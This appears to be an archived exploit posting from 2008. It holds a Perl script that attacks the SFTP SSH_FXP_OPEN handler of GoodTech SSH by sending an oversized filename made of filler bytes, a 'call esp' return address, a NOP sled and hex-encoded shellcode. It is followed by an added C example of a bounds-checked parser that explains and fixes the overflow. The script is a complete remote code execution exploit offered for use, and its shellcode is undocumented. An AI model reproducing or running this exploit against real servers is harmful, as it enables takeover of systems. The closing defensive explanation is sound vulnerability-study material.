GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
Source: writ3r [at] gmail.com  Author: r0ut3r  Published: 2008-10-23
# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer overflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)

use strict;
use warnings;
use Net::SSH2;

# Credentials for a valid account on the target SSH server
my $user = "root";
my $pass = "yahh";

# Target host and port
my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || die "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $junk = 'A'x164;             # 164 bytes of filler
my $eip = "\x49\x13\x9c\x7c";   # call esp
my $nops = "\x90"x20;           # NOP sled in front of the shellcode

my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x33".
"\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\xdb\xd7\x63\xf1".
"\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x4b\x2f\x73\x85".
"\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\xdd\x1f\x5c\x97".
"\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x08\x7a\xb8\x26".
"\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x6c\x32\x9d\xe5".
"\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\xb8\x6d\xac\x85".
"\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x7d\x20\x70\x5e".
"\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x6c\x7a\x63\xde".
"\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\xb2\xc3\x94\x0c".
"\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\xe5\x7d\xcf\x5d".
"\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x55\x7d\x15\xef".
"\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x66\xd1\x4c\x66".
"\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\xd6\x67\x1a\x47".
"\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x4a\xe8\xe5\x59".
"\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\xba\xcb\xf6\x5e".
"\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x99\xd0\xde\x23".
"\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\xcd\x9d\x8a\xf1".
"\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x62\x7f\xc9\x5f".
"\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\xcc\x19\x63\xde".
"\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\xdc\xe0\x7c\x6e".
"\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";

my $payload = $junk.$eip.$nops.$shellcode;

# The oversized string is passed as the filename argument of SSH_FXP_OPEN
my $sftp = $ssh2->sftp() || die "[-] Unable to open SFTP subsystem\n";
$sftp->open($payload);

print "[+] Sent\n";
$ssh2->disconnect;
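The exploit passes an oversized filename to SSH_FXP_OPEN and lands on the saved return address after 164 bytes of filler, the signature of a fixed-size stack buffer that receives the client-supplied string without comparing the wire length against the buffer. The C sketch below is added here as an illustration of that bug class and its fix; it is not GoodTech's code. It parses an SSH_FXP_OPEN request (uint32 length, byte type, uint32 id, string filename, uint32 pflags, attrs) with every wire length checked before any copy. The 164-byte buffer size, the status codes and the helper names are assumptions, and the sample packets are constructed inline.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical server-side handling of SSH_FXP_OPEN (not GoodTech's code).
 * Shows the length check whose absence turns a long filename into a stack
 * overflow; buffer size and error codes are assumptions for the demo. */

#define SSH_FXP_OPEN 3u      /* message type from draft-ietf-secsh-filexfer */
#define PATH_BUF     164u    /* assumed fixed buffer; the exploit's filler is 164 bytes */

enum parse_status {
    OPEN_OK = 0,
    OPEN_ERR_SHORT,      /* packet truncated or outer length inconsistent */
    OPEN_ERR_TYPE,       /* not an SSH_FXP_OPEN message */
    OPEN_ERR_PATH_LEN    /* filename does not fit the fixed buffer */
};

typedef struct {
    uint32_t request_id;
    uint32_t path_len;          /* length claimed by the client */
    uint32_t pflags;
    char     path[PATH_BUF];    /* NUL-terminated copy of the filename */
} open_req_t;

/* SFTP integers are big-endian uint32. */
static uint32_t get_u32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void put_u32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Every length read from the wire is checked against the bytes actually
 * present and against the destination buffer before memcpy runs. */
enum parse_status parse_fxp_open(const uint8_t *pkt, size_t pkt_len, open_req_t *out) {
    if (pkt_len < 4) return OPEN_ERR_SHORT;
    uint32_t body_len = get_u32(pkt);
    /* body must hold at least type, id, string length prefix and pflags */
    if (body_len > pkt_len - 4 || body_len < 1 + 4 + 4 + 4) return OPEN_ERR_SHORT;

    const uint8_t *p = pkt + 4;
    if (*p++ != SSH_FXP_OPEN) return OPEN_ERR_TYPE;
    out->request_id = get_u32(p); p += 4;
    out->path_len   = get_u32(p); p += 4;

    size_t remaining = body_len - 9;                 /* after type, id, prefix */
    if (out->path_len > remaining - 4) return OPEN_ERR_SHORT;   /* pflags must still fit */

    /* This is the check the vulnerable pattern lacks: a memcpy of path_len
     * bytes into path[] regardless of sizeof(path). Reject before copying. */
    if (out->path_len >= PATH_BUF) return OPEN_ERR_PATH_LEN;

    memcpy(out->path, p, out->path_len);
    out->path[out->path_len] = '\0';
    p += out->path_len;
    out->pflags = get_u32(p);
    return OPEN_OK;
}

/* Build a well-formed SSH_FXP_OPEN packet with empty ATTRS (constructed
 * sample input). Returns the packet size, or 0 if the buffer is too small. */
size_t build_fxp_open(uint8_t *buf, size_t cap, uint32_t id, const char *path, uint32_t pflags) {
    size_t plen = strlen(path);
    size_t body = 1 + 4 + 4 + plen + 4 + 4;     /* type, id, string, pflags, attr flags */
    if (cap < 4 + body) return 0;
    put_u32(buf, (uint32_t)body);
    buf[4] = SSH_FXP_OPEN;
    put_u32(buf + 5, id);
    put_u32(buf + 9, (uint32_t)plen);
    memcpy(buf + 13, path, plen);
    put_u32(buf + 13 + plen, pflags);
    put_u32(buf + 17 + plen, 0);                /* ATTRS: flags = 0 */
    return 4 + body;
}

/* Convenience: build a request for `path` and return the parser's verdict. */
enum parse_status open_status_for(const char *path) {
    uint8_t pkt[1024];
    open_req_t req;
    size_t n = build_fxp_open(pkt, sizeof pkt, 1, path, 1);
    return n ? parse_fxp_open(pkt, n, &req) : OPEN_ERR_SHORT;
}

int main(void) {
    char big[201];
    memset(big, 'A', 200); big[200] = '\0';   /* constructed: longer than PATH_BUF */
    printf("normal filename: status=%d\n", open_status_for("/tmp/report.txt"));
    printf("200-byte filename: status=%d\n", open_status_for(big));
    return 0;
}
```

The same check applies to every SFTP operation that carries a string argument (opendir, unlink, rename and the rest), which is why the author notes that the other operations are vulnerable too: a parser that reads the length prefix into a fixed buffer once, in a shared string-decoding routine, fixes them all at one place.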
